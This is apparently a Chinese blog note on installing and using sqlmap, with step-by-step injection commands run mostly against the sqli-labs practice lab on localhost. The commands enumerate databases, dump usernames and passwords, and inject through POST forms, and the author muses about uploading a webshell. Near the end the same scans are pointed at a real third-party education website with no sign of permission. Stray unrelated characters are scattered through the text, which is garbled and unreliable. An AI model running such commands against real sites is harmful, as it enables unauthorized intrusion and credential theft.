sqlmap 基于Python2.7
因為我平時用得是 Python3.6腻要,所以這里切換一下:
py2和3都安裝結束后 接下來就是檢查環(huán)境變量柒竞,缺少的我們需要添加。
在path中找以下4個變量
1.c:\Python27
2.c:\Python27\Scripts
3.c:\Python36
4.c:\Python36\Scripts
少哪個加哪個霸琴,注意分號隔開
然后就能: py -2
py -3
實現版本切換了椒振。但是不穩(wěn)定
py版本切換.png
把sqlmap解壓到Python27里,再在文件夾里新建.bat文件物舒,(cmd.exe),以實現直接打開此地址的命令斋配。
輸入: sqlmap.py -h 啟動sqlmap
某道友寫的操作:http://www.reibang.com/p/17509d0a1ba3
以第一關測試下:
C:\Python27\sqlmapproject-sqlmap-509bb41>sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1"
會得到:
1.png
sqlmap功能作用.png
查看數據量.png
貌似很重要的東西呢
--current-db 當前使用數據庫
--current-user 當其使用用戶名
--count -D "security" 查看數據量
--privileges 查看用戶權限(比較長
--delay 5 或 -safe-freq 延時注入
大概MySQL的注入順序:
圖2
2.png
最后的報字段這樣寫: --dump -C "username" -T "users" -D "security"
空格很重要
交互式:禮尚往來
注入點的用戶權限必須最高
webshell?
似乎可以通過這個上傳腳本木馬
python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C"id,password,username" --dump 報字段的具體內容
post注入可以說是靈魂了
burp抓文件:
python sqlmap.py -r "C:\233" -p uname --dbs (規(guī)則同上) uname看源代碼
-p uname -D security --tables 猜表
-p uname -D security -T users --columns 猜列
發(fā)送給本頁面自己:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --forms
form表單action=" " 也會給出payload
指定下參數:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "uname=1&passwd=1"
下面那些就是無意義的嘗試了
http://i.mooc.chaoxing.com/space/index.shtml
python sqlmap.py -u "http://i.mooc.chaoxing.com/space/index.shtml" --forms
form表單action=" "
python sqlmap.py -r "C:\23333\244" -p password --dbs
C:\23333
python sqlmap.py -u "http://127.0.0.1/message/register.php" --forms
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "nam=1&pwd=1"
